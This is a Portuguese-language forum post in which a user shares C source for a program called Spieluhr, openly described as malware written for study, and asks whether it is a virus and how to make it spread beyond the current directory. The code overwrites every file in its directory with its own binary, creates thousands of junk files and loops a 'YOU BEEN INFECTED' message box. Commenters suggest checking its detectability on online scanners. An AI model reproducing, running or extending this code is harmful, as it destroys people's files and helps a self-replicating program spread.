Spieluhr - esse código pode ser considerado um vírus?

Publicado por Saw (última atualização em 12/01/2022)

[ Hits: 407 ]

Download 7220.Spieluhr.c




Olá pessoal, então... Estava pensando em estudar desenvolvimentos de malwares(VOLTADO PARA ESTUDOS SÓ), e criei esse código o nomeei de (spieluhr). Porém não sei se ele pode ser considerado um vírus... Se alguém puder tirar minha dúvida agradeço. O código está todo comentado para facilitar a compreensão de vocês, agradeço a atenção.
Por enquanto ele só se replica nos arquivos do diretório atual, se alguém puder passar uma ajuda de como posso fazer para ele se replicar a outros diretórios etc agradeço.

  



Esconder código-fonte

#include <stdio.h> // Importa a biblioteca de entrada e saida
#include <stdlib.h> // Importa a biblioteca do sistema
#include <dirent.h> // Importa a biblioteca de diretórios
#include <windows.h> // Importa a API do windows
int main(void) // Função Main para iniciação do algoritmo
{
    DIR *dir; // Ponteiro para o diretório
    struct dirent *lsdir; // Estrutura para armazenar os nome dos arquivos
    FILE *mal; // Ponteiro para abrir o vírus
    FILE *host; // Ponteiro para abrir o arquivo a ser infectado
    dir = opendir("."); // Ponteiro que recebe o diretório
    while (( lsdir = readdir(dir)) != NULL ) // Estrutura While para ler o que há nos diretórios
    {
        char Buffer[42269]; // Buffer para armazenar o binário do vírus
        mal = fopen("Spieluhr.exe", "rb"); // Abre o vírus em modo leitura de binários
        host = fopen(lsdir->d_name, "rb+"); // Abre o arquivo a ser infectado leitura\escrita de binário
        fread(Buffer, 42269, 1, mal); // Ler o código binário do vírus
        fwrite(Buffer, 42269, 1, host); // Escreve o binário do vírus no hospedeiro
    }
    int x = 0; // Cria variável do tipo inteiro para o for seguinte
    FILE *cf; // Cria um ponteiro para arquivo "CREATE FILE"
    char c; // Char para receber inteiros e converter para números
    char *ps; // Ponteiro para apontar para C
    int l = 65; // Interio para iniciar a contagem
    while(x < 3) // Laço WHILE para terminar de executar as ações proprostas
    { 
        for(l; l < 10000; ++l) // For de l(65) até l(1000)
        {   
            c = l; //Char para receber L e converter para char
            ps = &c; // Apontador para C
            cf = fopen(ps, "w"); //Gerador de arquivo
        }
        printf("\a"); // Solta o som do windows 
        Sleep(1000); // Faz a máquina esperar 1 segundos para a próxima Execução
        MessageBox(0, "YOU BEEN INFECTED", "Spieluhr", MB_OK); // Windows Box
        //O While está sem incremento para manter o laço infinito
    }
    closedir(dir);
    return 0; // Retorna 0 a função main
}

Scripts recomendados

DoS criado em C para uso didáticos

Fork bomb em C

Criptografia em C

Captura de Banners dos Serviços

IntensiveDoS - ferramenta de DoS para pentesting


  

Comentários
[1] Comentário enviado por junior_ em 14/01/2022 - 08:11h


Olá, talvez você possa colocar este cara em uma Sandbox online pra verificar se é detectável e também verificar esta amostra no virustotal. Geralmente para analise de Ransomware Microsoft tem servido bem, mas testa pra Gnu Linux/Unix.

https://www.virustotal.com/gui/home/upload

SANDBOX(Caixa de areia...rs)
https://www.hybrid-analysis.com/
https://app.any.run/

[2] Comentário enviado por junior_ em 14/01/2022 - 08:24h

Este acho que consegue verificar/checar em Shell Script/Bash.

https://metadefender.opswat.com/

[3] Comentário enviado por junior_ em 14/01/2022 - 08:25h


Outros Similares/Equivalentes.

https://www.raymond.cc/blog/battle-of-the-6-online-malware-file-scanners/

[4] Comentário enviado por mauricio123 em 25/01/2022 - 22:14h


Interessante. Já é possível se ter uma ideia de como pode funcionar um malware.

___________________________________________________________
Conhecimento não se Leva para o Túmulo.
https://github.com/mxnt10


Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts